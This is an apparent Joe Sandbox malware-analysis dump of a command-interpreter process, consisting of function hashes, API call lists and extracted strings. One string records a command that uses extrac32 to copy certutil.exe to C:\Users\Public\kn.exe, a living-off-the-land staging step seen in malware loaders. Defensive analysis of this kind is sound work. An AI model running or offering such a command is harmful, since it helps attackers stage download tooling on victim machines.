                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                        • String ID:
                                        • API String ID: 611521582-0
                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction ID: 9e5799fdc5fe692cc65ee4aa0a0eecbb6b4a2efd42280abfbdbf4bb7a08923ea
                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction Fuzzy Hash: 93A1A532B0CA12D6E714AF61E8182BDF6A2FB49BA5F844135CF1E86754EF3CA545C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                        • String ID: \\?\
                                        • API String ID: 628682198-4282027825
                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction ID: 29c55dba9c3ca7ba56b6056841f8851fa4b075222ca748d6f365c69e6b3eef11
                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction Fuzzy Hash: 6EE1A321B0C682D6EB60AF25D8446F9A3A1EB547A8F844136DF6E87794FF3CE645C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                        • String ID:
                                        • API String ID: 16309207-0
                                        • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                        • Instruction ID: 7dc81181f799edf091876d562194689599abd901a18f2449f5e9d13823b1eabb
                                        • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                        • Instruction Fuzzy Hash: 5322A022B08B8286EB65AF25D8542F9B7A1FF457A4F804135DF2E4B795EF3CE2458310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                        • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 3863671652-4137775220
                                        • Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                        • Instruction ID: f248013f9e883636b4acd5f35264bcea3028818632da8f5bc16538ef113bcc31
                                        • Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                        • Instruction Fuzzy Hash: A4E19D21B0D64286FA60BF66E854779E6A5AF857B0FC44035DF2D822D5FF3CEA418720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                        • String ID: $Application$System
                                        • API String ID: 3538039442-1881496484
                                        • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                        • Instruction ID: 2b9f630ffcd6e6f7ac486c2523723558a87f843ad4f0cea80d3a7f3077a48259
                                        • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                        • Instruction Fuzzy Hash: 4051AB32B0CB4192EA20AF55E40467AFAA2FB89BA4F848135DF6E43754EF3CD6058710
                                        APIs
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD4A048E), ref: 00007FF7CD4ADA58
                                        • memset.MSVCRT ref: 00007FF7CD4ADAD6
                                        • memset.MSVCRT ref: 00007FF7CD4ADAFC
                                        • memset.MSVCRT ref: 00007FF7CD4ADB22
                                          • Part of subcall function 00007FF7CD493A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                          • Part of subcall function 00007FF7CD485194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7CD4851C4
                                          • Part of subcall function 00007FF7CD49823C: FindFirstFileExW.KERNELBASE ref: 00007FF7CD498280
                                          • Part of subcall function 00007FF7CD49823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD49829D
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                          • Part of subcall function 00007FF7CD484FE8: _get_osfhandle.MSVCRT ref: 00007FF7CD485012
                                          • Part of subcall function 00007FF7CD484FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485030
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4ADDB0
                                          • Part of subcall function 00007FF7CD4859E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485A2E
                                          • Part of subcall function 00007FF7CD4859E4: _open_osfhandle.MSVCRT ref: 00007FF7CD485A4F
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4ADDEB
                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4ADDFA
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE204
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE223
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE242
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                        • String ID: %9d$%s$~
                                        • API String ID: 3651208239-912394897
                                        • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                        • Instruction ID: b94ce77730f8bbcf9c2dbed0f8b6f6cbff53ae0af66a8e4476c83bd1e34ed27a
                                        • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                        • Instruction Fuzzy Hash: 15427132B0C6828AE764BF25D8506F9B7A5FB85764F900035EF6D47A99EF3CE6408710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                        • String ID: COPYCMD$\
                                        • API String ID: 3989487059-1802776761
                                        • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                        • Instruction ID: 18a06a8cdf1545fa4d115c061eab6037dabb58c7c9a720ffedfa68ee630bbffa
                                        • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                        • Instruction Fuzzy Hash: 2DF1B265B0C74682EA24BF1598442BAB3A1EF55BE8F848035CF6E87795FE3CE6458310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                        • API String ID: 55602301-2548490036
                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                        • Instruction ID: 9be6315d5deab7ceaa7c7e26fdc25d3119429993e57073a66e82ed2ec4537b85
                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                        • Instruction Fuzzy Hash: 45A18F32B0D64296EA10AF52E440AB9F7AAFB95764FD00135EF6E02694FF3CE644C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                        • String ID:
                                        • API String ID: 3935429995-0
                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                        • Instruction ID: f212d6428fa9398c4682352b6783e40207a4e27f1de67dfbeedfba8d6fdd3a28
                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                        • Instruction Fuzzy Hash: 2661E226B1CA92D6EB10AF62A404579FBA5FF98F64F858131DF5A43790EF3CD6018710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                        • Instruction ID: 9df834f2206d5046f49a453d9d26553124fcc18d73594a1db563f4b3058e82e1
                                        • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                        • Instruction Fuzzy Hash: 2B91903270CA82C6EB24AF29D8142F9B6A1FB55764F844136DF6E86694EE3C9644C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandlememset$wcschr
                                        • String ID: DPATH
                                        • API String ID: 3260997497-2010427443
                                        • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                        • Instruction ID: 3ad97028dfcbc0501311627a27e6b0d1e673f3b9f74773ae7eea891f3f8c0722
                                        • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                        • Instruction Fuzzy Hash: 40D17D22B0C64286EB20AF66D844579A2A6FB44BA4F844235DF3D477D5EF3CEA41C760
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                        • String ID: @P
                                        • API String ID: 1801357106-3670739982
                                        • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                        • Instruction ID: 2255875a7953c575c309c3d16ae7e66d45e9b320ef3a6256290a307af2bbfb31
                                        • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                        • Instruction Fuzzy Hash: BF416D32B08A41DAE710AF65D4442EDBBA1FB99768F858231DF2D43A88EF78D604C750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$BufferConsoleInfoScreen
                                        • String ID:
                                        • API String ID: 1034426908-0
                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction ID: ab4046b07d295918f6f0631b6a6f7e8c16e93d6b0522bb4766014d40d45811ed
                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction Fuzzy Hash: E9F1A532B0C68289EB64EF21D8902E9B7A5FF457A8F844135DF6D87695EF38E604C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseValue$CreateDeleteOpen
                                        • String ID: %s=%s$\Shell\Open\Command
                                        • API String ID: 4081037667-3301834661
                                        • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                        • Instruction ID: f97a4c73e44ffb86c01bac49265f27a37f42783ecd4d81333d35d557c49e90be
                                        • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                        • Instruction Fuzzy Hash: A571A321B0DB8292FA10AF55A4952BAE2A1FF857A4FC44131DF6E07784EF3CDA458720
                                        APIs
                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAA85
                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAACF
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAAEC
                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB39
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB6F
                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABA4
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue$CreateOpen
                                        • String ID: %s=%s
                                        • API String ID: 1019019434-1087296587
                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction ID: f007e954e358e46a7d53308fe7ab0e7ccf58a36e443dc75a377490044dfa2c28
                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction Fuzzy Hash: 31519431B0CB4296E760AF65E44576AF6A2FB897A0F808235CF6D83791EF38D5418710
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcsnicmpwcsrchr
                                        • String ID: COPYCMD
                                        • API String ID: 2429825313-3727491224
                                        • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                        • Instruction ID: 5da91edd810be3f8390a10c685f2409b81c1bb34a0dbd40f157d9eb949bae936
                                        • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                        • Instruction Fuzzy Hash: D6F19F32F0C652C6FB60AF51D4401BDB6A5AB547A8F804236CF6E636D8FE3CA641C760
                                        APIs
                                        Similarity
                                        • API ID: memset$FullNamePathwcsrchr
                                        • String ID:
                                        • API String ID: 4289998964-0
                                        • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction ID: 885a15515db1fc1cf5403e128357c2e0dcc0e3501cf21938d8f32ac7cc322c9e
                                        • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction Fuzzy Hash: A7C1E511B0E35682EE94BF52958837AA3A1FB54BA0F846534CF2E477D0FF3CA6519320
                                        APIs
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                        • String ID:
